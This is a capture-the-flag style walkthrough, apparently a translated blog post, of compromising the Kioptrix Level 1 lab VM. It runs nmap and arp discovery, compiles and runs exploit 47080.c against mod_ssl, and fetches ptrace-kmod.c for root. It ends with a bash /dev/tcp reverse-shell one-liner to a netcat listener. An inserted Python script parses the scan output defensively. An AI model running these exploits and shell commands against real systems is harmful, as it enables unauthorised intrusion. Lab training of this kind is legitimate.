Kioptrix Level 1 (Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4)

Posted by Man_Y on 2024-06-25

Preparation

For setting up the lab VM, search Baidu yourself.

Modify one parameter in the .vmx file as shown below so that the network connection becomes NAT; whenever you boot the target VM, make sure the network is set to NAT.

ethernet0.networkName = "nat"

Getting started

Exploiting the vulnerability in the old Apache version (Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4)

Boot Kali and check its current IP (ifconfig); the Kali IP is 192.168.217.128

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.217.128  netmask 255.255.255.0  broadcast 192.168.217.255
        inet6 fe80::20c:29ff:fe96:9dd7  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:96:9d:d7  txqueuelen 1000  (Ethernet)
        RX packets 1388089  bytes 911013407 (868.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1138957  bytes 68486094 (65.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4  bytes 240 (240.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 240 (240.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Use nmap to scan for live hosts; host .129 shows up

nmap -sP 192.168.217.0/24

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-24 18:13 CST
Nmap scan report for 192.168.217.2 (192.168.217.2)
Host is up (0.0028s latency).
Nmap scan report for 192.168.217.128 (192.168.217.128)
Host is up (0.00019s latency).
Nmap scan report for 192.168.217.129 (192.168.217.129)
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.35 seconds

Or use netdiscover

netdiscover -i eth0 -r 192.168.217.0/24
-i: network interface
-r: network range

 Currently scanning: Finished!   |   Screen View: Unique Hosts
 8 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 480
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.217.1   00:50:56:c0:00:08      5     300  VMware, Inc.
 192.168.217.2   00:50:56:ed:47:4d      1      60  VMware, Inc.
 192.168.217.129 00:0c:29:f9:00:af      1      60  VMware, Inc.
 192.168.217.254 00:50:56:f7:3a:e5      1      60  VMware, Inc.

Or arp-scan

arp-scan -l

Interface: eth0, type: EN10MB, MAC: 00:0c:29:96:9d:d7, IPv4: 192.168.217.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.217.1   00:50:56:c0:00:08       VMware, Inc.
192.168.217.2   00:50:56:ed:47:4d       VMware, Inc.
192.168.217.129 00:0c:29:f9:00:af       VMware, Inc.
192.168.217.254 00:50:56:f7:3a:e5       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.111 seconds (121.27 hosts/sec). 4 responded

Probe all ports for open services

nmap -p- 192.168.217.129

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-24 18:21 CST
Nmap scan report for 192.168.217.129 (192.168.217.129)
Host is up (0.0019s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

Port 80 is open; visiting the web page shows only a default test page

Approach: check whether the web page has any related vulnerabilities, and scan its directory structure

dirsearch -u http://192.168.217.129

Visited each of the results, but found nothing exploitable

Detailed service scan

nmap -sV -A 192.168.217.129

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-24 18:28 CST
Nmap scan report for 192.168.217.129 (192.168.217.129)
Host is up (0.0019s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_http-title: 400 Bad Request
|_ssl-date: 2024-06-24T10:31:15+00:00; +1m52s from scanner time.
1024/tcp open  status      1 (RPC #100024)

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: 1m51s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.81 seconds

Approach: look at the version shown next to each service, then search msf for related exploits that can be used

The latest Apache release is already 2.4.xx, but the version here is much older, so check whether this old version has any known vulnerabilities
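As an added example (not from the original post), the following Python script parses the relevant lines of the nmap -sV -A output above, embedded here as a constructed sample, and flags the legacy signals a defender would want to remediate on this host: SSHv1, the end-of-life Apache 1.3 and OpenSSL 0.9 branches, the TRACE method, SSLv2 with its export/DES/RC4 ciphers, and the expired certificate. The function names and the scan-year parameter are my own assumptions.

```python
import re

# Constructed sample: the relevant lines of the page's "nmap -sV -A" output.
NMAP_OUTPUT = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_  Potentially risky methods: TRACE
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_Not valid after:  2010-09-26T09:32:06
|   SSLv2 supported
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
"""
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def parse_services(text):
    """Group each open port with the NSE script lines printed beneath it."""
    services, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "service": m.group(3),
                       "version": m.group(4).strip(), "script": []}
            services.append(current)
        elif current is not None and line.startswith("|"):
            current["script"].append(line.lstrip("|_ ").strip())
    return services

def assess(services, scan_year=2024):  # default: the scan date shown on the page
    """Return (port, finding) pairs for the legacy-configuration signals above."""
    findings = []
    for s in services:
        port, version, script = s["port"], s["version"], "\n".join(s["script"])
        if "Server supports SSHv1" in script:
            findings.append((port, "SSHv1 enabled"))
        if re.search(r"Apache(?: httpd)?[ /]1\.3\.", version):
            findings.append((port, "Apache 1.3.x (end-of-life branch)"))
        if "OpenSSL/0.9." in version:
            findings.append((port, "OpenSSL 0.9.x (end-of-life branch)"))
        if "Potentially risky methods: TRACE" in script:
            findings.append((port, "HTTP TRACE enabled"))
        if "SSLv2 supported" in script:
            findings.append((port, "SSLv2 enabled"))
        for c in re.findall(r"SSL2_\S*?(?:EXPORT40|DES_64|RC4)\S*", script):
            findings.append((port, f"weak cipher {c}"))
        m = re.search(r"Not valid after:\s+(\d{4})", script)
        if m and int(m.group(1)) < scan_year:
            findings.append((port, f"certificate expired ({m.group(1)})"))
    return findings
```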

searchsploit mod_ssl

About searchsploit ("searchsploit" is a command-line search tool for Exploit-DB that also lets you carry a copy of Exploit-DB with you.)
searchsploit vulnerability lookup tool usage guide (exploit-db.com offline tool exploitdb)_searchsploit installation - CSDN blog

You can also check for the latest exploits at Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

The locate command is mainly used to find files, but it is much faster than find, because instead of walking the filesystem it searches a database, /var/lib/mlocate/mlocate.db. This database holds information on all local files; the Linux system creates it automatically and updates it once a day.

Find where the file currently is
locate unix/remote/47080.c

/usr/share/exploitdb/exploits/unix/remote/47080.c

Copy this file to the desktop

Check the current path
pwd

/home/kali/Desktop


cp /usr/share/exploitdb/exploits/unix/remote/47080.c /home/kali/Desktop

Take a look at the file

vim 47080.c

apt-get install libssl-dev

gcc -o 47080 47080.c -lcrypto

47080 here is just a name I picked for the compiled binary;
47080.c is the exp copied to the desktop earlier.

Run the compiled binary to see its usage

target is the version we pick from the list below, e.g. 0x6a; box is the target's IP address; the port number is optional

From the detailed service scan above we know the Apache version is 1.3.20
[Apache/1.3.20 (Unix) (Red-Hat/Linux)]

Based on that version, only these two targets apply to us

Build the exp command line and connect

./47080 0x6a 192.168.217.129 443 -c 40
Fails

./47080 0x6b 192.168.217.129 443 -c 40
Succeeds

Running whoami shows the shell does not have root privileges; the cause is that one of the scripts referenced in the file was not executed and so had no effect. Copy the name of the file that did not run.

Open the exp file to find the download path of that file

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Downloaded successfully to the Kali desktop

Start a web server on Kali so the target machine can download this file from it

python -m http.server 80

wget 192.168.217.128/ptrace-kmod.c

Upload and compile

We need to reconnect (effectively refreshing the session); this time we get root privileges

Reverse shell

Start a listener on the Kali host
nc -lvvp 7777

Run on the target host
bash -i >& /dev/tcp/192.168.217.128/7777 0>&1

Tools involved

  1. nmap
  2. netdiscover (scan for live hosts) (Using netdiscover for active/passive scanning)
  3. arp-scan (scan for live hosts) (Kali arp-scan network scanning tool: scanning LAN IP addresses - CSDN blog)
  4. dirsearch (Installing and using dirsearch on Kali_kali dirsearch - CSDN blog)
